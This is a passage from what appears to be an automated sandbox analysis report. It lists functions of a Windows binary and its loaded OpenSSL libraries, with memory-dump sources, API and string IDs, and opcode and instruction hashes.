                                                              • Opcode Fuzzy Hash: b92129e8508862641eed399a8e5179a0bb6c7147643e5021365d23c2bd3b3ffe
                                                              • Instruction Fuzzy Hash: 71317C72B1A64796E714DB11D460AE97361EF84798F804135EA6D8B7EDDF3CE504CB00
                                                              Function 00007FFE13339BAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID: void$void
                                                              • API String ID: 2943138195-3746155364
                                                              • Opcode ID: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
                                                              • Instruction ID: 04cc885adb2808f19252bbfc34cd981e7a2cd9a1e04c268db0652d5089bb7384
                                                              • Opcode Fuzzy Hash: ff67bb32e799e4a453516f5f2b265aba841f0c9d9f12838b8a28f15594d75a10
                                                              • Instruction Fuzzy Hash: C9314872E18E558CFB10CB62D8411EC73B0BB68B68B404176DE6E63B68DF389144C718
                                                              Function 00007FFDFAEE6540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: Time$System$File
                                                              • String ID: gfff
                                                              • API String ID: 2838179519-1553575800
                                                              • Opcode ID: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                              • Instruction ID: 0a4ed2ed3821c411446cc7944bb48466f2dcbc343de08b39b1893a67af93730b
                                                              • Opcode Fuzzy Hash: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
                                                              • Instruction Fuzzy Hash: 84210672B1864786DB989F28E46077977E0EB88B98F458075EE5EC7798EE3DD8408700
                                                              Function 00007FFDFAF13EC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ..\s\ssl\ssl_sess.c$T
                                                              • API String ID: 0-2647723609
                                                              • Opcode ID: 5880672ac5d53579d539c506b9ea1cefb64f0d00ca576262034d82b874cbd273
                                                              • Instruction ID: 0654ece57e14972ba482e8d5b2553f5ef0ab47850a8ad3c59cc246e5337153b7
                                                              • Opcode Fuzzy Hash: 5880672ac5d53579d539c506b9ea1cefb64f0d00ca576262034d82b874cbd273
                                                              • Instruction Fuzzy Hash: 32215021B1864282F758DB65D864BE966A0EF44754F884276FE1D4B7C9EF3DE608CB00
                                                              Function 00007FF623F8F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID: :
                                                              • API String ID: 1611563598-336475711
                                                              • Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                              • Instruction ID: 0a940bc60a88fbf771b7aefe55a1f53a7f495d09827874b143850ab3efdac13a
                                                              • Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
                                                              • Instruction Fuzzy Hash: 19213922B1834185EF288F12F84623D33A1FB84B84F468175D64CA3294DF7CDA44C742
                                                              Function 00007FFDFAEE175D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007E133311
                                                              • String ID: ..\s\ssl\statem\extensions_srvr.c$3
                                                              • API String ID: 3807962231-3555168737
                                                              • Opcode ID: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
                                                              • Instruction ID: d0389eea2867dec62a164af22a947453a8e16d22f620d2971cd1302898c66510
                                                              • Opcode Fuzzy Hash: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
                                                              • Instruction Fuzzy Hash: 05219F72708A4186E7558F11E8506AC63A8EB48B94F584271EE6C4BBD9DF7DD6D0C700
                                                              Function 00007FFDFAFA338C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLastgetsockname
                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                              • API String ID: 566540725-540685895
                                                              • Opcode ID: 5eba5f4fb37063eb421bd785aab33e1d3d53f176506f7daf47244a11d094d287
                                                              • Instruction ID: 66ae3df16f3759b62c97afcf322ab9d709848d343407fd0509c761fbbf7b8b07
                                                              • Opcode Fuzzy Hash: 5eba5f4fb37063eb421bd785aab33e1d3d53f176506f7daf47244a11d094d287
                                                              • Instruction Fuzzy Hash: 8B21AF72B19107C6E720DB61D821AEE7760EF84319F404235E67C4AAE8DF3DE689DB40
                                                              Function 00007FFE1333604F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileHeader$ExceptionRaise
                                                              • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                              • API String ID: 3685223789-3176238549
                                                              • Opcode ID: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
                                                              • Instruction ID: a32a21b9cc61e49e9fb102109fa3fcc1112c1fd17530dd9ad6498ccffabdeedf
                                                              • Opcode Fuzzy Hash: d06b4d24d7aa4607bffac334420f89fbd77c373aef9fdd9199db5b082a62258c
                                                              • Instruction Fuzzy Hash: 42017161A2DE469DEE409B16E8911B8A320FFA0FB4F4094B1D56E176B9EF6CD504C708
                                                              Function 00007FF623F7FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                              • Instruction ID: 323b94d718675f91b4ae4befd456472519ee6fb56b2f6504c6085f937d8bf846
                                                              • Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
                                                              • Instruction Fuzzy Hash: CB112E32618B8182EB618F15F84025977E4FB88B84F594270DB8D5B754DF3CDA518740
                                                              Function 00007FFE133363F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: ExceptionFileHeaderRaise
                                                              • String ID: csm
                                                              • API String ID: 2573137834-1018135373
                                                              • Opcode ID: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                              • Instruction ID: 8966c256946d14adadc8b8d42dcb6e9085247a525fb944aadbaa6be27de9e09c
                                                              • Opcode Fuzzy Hash: 04e89f2c23f7d49b97199698fdfbf86ccf7878464e1c577e170b006b6ea557c8
                                                              • Instruction Fuzzy Hash: B3116032A18F4186EB118F16F440269B7A4FB94BA4F188170DF9D17764DF3DC451C704
                                                              Function 00007FF623F9073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: DriveType_invalid_parameter_noinfo
                                                              • String ID: :
                                                              • API String ID: 2595371189-336475711
                                                              • Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                              • Instruction ID: 0bbbad497ee6e6cdd14f66b7ed65495ed5db67aebdf396aa308d87656ef8f151
                                                              • Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
                                                              • Instruction Fuzzy Hash: B8017121A1820385FF249F60BC6327E22A0EF44794F804475D94DE7691EF2CD6048B17
                                                              Function 00007FFDFAEE6FA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986715794.00007FFDFAEE1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAEE0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986686816.00007FFDFAEE0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF54000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF79000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF84000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986715794.00007FFDFAF8E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986917456.00007FFDFAF91000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986947251.00007FFDFAF93000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                              Similarity
                                                              • API ID: Time$System$File
                                                              • String ID: gfff
                                                              • API String ID: 2838179519-1553575800
                                                              • Opcode ID: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
                                                              • Instruction ID: 8570def8ce61f402c8dce66a3bf699a32b690d880e9df8a095c2c76ff58f313b
                                                              • Opcode Fuzzy Hash: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
                                                              • Instruction Fuzzy Hash: 820126E2B1864582EF64DB29F8111556790EBCC794B449131FB5ECFBA9EE2CD6418B00
                                                              Function 00007FFDFAFA15AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007
                                                              • String ID: !$..\s\crypto\ct\ct_policy.c
                                                              • API String ID: 3568877910-3401457818
                                                              • Opcode ID: eea727c2c650749376e6f7709fbe9c773a3b3b2520ee859c13efa1a6d34b5bfc
                                                              • Instruction ID: d4f20947a0767bbafe091a742ec4ed6979be3db37ee9edba62268d33896a9a14
                                                              • Opcode Fuzzy Hash: eea727c2c650749376e6f7709fbe9c773a3b3b2520ee859c13efa1a6d34b5bfc
                                                              • Instruction Fuzzy Hash: 3FF0AF31B1620382EB149B24D421BED6250EF80304F440034DA2D8A7E9EE3CB655EB40
                                                              Function 00007FFDFAFA6BEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLastioctlsocket
                                                              • String ID: ..\s\crypto\bio\b_sock.c
                                                              • API String ID: 1021210092-540685895
                                                              • Opcode ID: 874f4edec6eb816a1ff5eb4e5d2cc5ac46c60ec8e5f89df9828d11ec1872b5a1
                                                              • Instruction ID: 72300986822f163a3584dcd1472bd37d7435f9001b9007823d4adbb32508ef9e
                                                              • Opcode Fuzzy Hash: 874f4edec6eb816a1ff5eb4e5d2cc5ac46c60ec8e5f89df9828d11ec1872b5a1
                                                              • Instruction Fuzzy Hash: 52E0D851F1A1038BF3216F61D835FB62210AF44306F004134E93DCA6F8DF2DF5448620
                                                              Function 00007FFE1333672C Relevance: 5.1, APIs: 4, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FFE133365B9,?,?,?,?,00007FFE1333FB22,?,?,?,?,?), ref: 00007FFE1333674B
                                                              • SetLastError.KERNEL32(?,?,?,00007FFE133365B9,?,?,?,?,00007FFE1333FB22,?,?,?,?,?), ref: 00007FFE133367D4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
                                                              • Instruction ID: a2e6c9c8cf3dc9d4a7ff3ffa0897b3910c4312e2f03a86ea968201e49e98d021
                                                              • Opcode Fuzzy Hash: c7aaac8a80d8b30c274ca3e3b7c59e83a4e0092024cc1b5b0b7c72c8c7be0031
                                                              • Instruction Fuzzy Hash: 76116624F0DE528DFA148B23A884134A291AF64FB0F5486B4D97E237F5DF2CA4419708

                                                              Executed Functions

                                                              Function 00007FFD9AEE68FB Relevance: .3, Instructions: 282COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1933338354.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3411df1390ab31249b112dcdb23305b8e8056f41a66c11d836a594874a19541e
                                                              • Instruction ID: f2adcd5beef838785bc06c99d76a165fcfa687c5788bc18ad3e10a8bbf0ad910
                                                              • Opcode Fuzzy Hash: 3411df1390ab31249b112dcdb23305b8e8056f41a66c11d836a594874a19541e
                                                              • Instruction Fuzzy Hash: 04812832B1DA8A0FEBA9FBA848255B9BBD0EF45354F2401FED45DC70D3DA1AAC058351
                                                              Function 00007FFD9AE1BD10 Relevance: .2, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1932544897.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 278a29148d34b400bd2c37a6e2b393d0a162a8077e88313e7e0d6877c3424a94
                                                              • Instruction ID: c74cd545118a4897c42bd39c2024a981cf8a7d06b4aa1ee83175923a15432584
                                                              • Opcode Fuzzy Hash: 278a29148d34b400bd2c37a6e2b393d0a162a8077e88313e7e0d6877c3424a94
                                                              • Instruction Fuzzy Hash: 07414B32B0D6D84FE71E9A6C985A6E57BE0EF42320F0842FFD498CB0D3DA2564468791
                                                              Function 00007FFD9AE19880 Relevance: .1, Instructions: 126COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.1932544897.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
